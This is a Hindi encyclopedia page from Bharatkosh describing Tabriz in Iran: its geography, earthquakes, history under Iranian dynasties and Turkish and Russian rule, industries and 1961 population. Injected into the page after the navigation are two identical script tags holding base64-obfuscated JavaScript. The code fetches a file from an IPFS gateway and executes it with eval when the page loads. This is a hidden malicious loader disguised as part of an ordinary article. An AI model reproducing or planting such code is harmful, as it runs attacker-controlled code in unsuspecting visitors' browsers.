तबरेज

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

तबरेज या तैब्रीज़ ईरान के उत्तरी-पश्चिमी प्रांत आज़रबाइजान की राजधानी तथा मुख्य नगर है। यह सोवियत रूस की सीमा से ६० मील दक्षिण एवं टर्की से ११० मील पूर्व में स्थित है। नगर समुद्रतल से ४,६०० फुट ऊँचाई पर स्थित है। भूकंप के धक्के लगा करते हैं। भूकंप क्षेत्र में स्थित होने के कारण यहाँ प्राय: हलके भूकंप के धक्के लगा करते हैं। यह ऐतिहासिक नगर है और ईरान के विभिन्न राज्यवंशों की राजधानी रह चुका है। अनेकाबार तुर्की एवं रूसी इसे अपने अधिकार में रख चुके है, किंतु यह सदा पश्चिमी ईरान का महत्वपूर्ण नगर रहा। प्राचीन भवनों के भ्ग्नावशेष भी यहाँ है। व्यापारिक मार्ग पर स्थित रहने के कारण यह उन्नति करता रहा।

तबरेज़ कंबल बुनने का कंद्र है। कुछ वर्षों पूर्व ही यहां चमड़ा, सूती धागा, दियासलाई इत्यादि के उद्योग विकसित हुए हैं। यहाँ एक विश्वविद्यालय, गिरजाघर, हवाई अड्डा तथा अस्पताल हैं। अन्य व्यापारिक मार्गों के खुल जाने के कारण अब इसकी उन्नति मंद हो गई है। जनसंख्या की वृद्धि के साथ उद्योगों का तीव्र विकास न होने से यहाँ से लोग प्रवासित होने लगे हैं। यहाँ की जनसंख्या लगभग ३,००,००० (१९६१) थी।


टीका टिप्पणी और संदर्भ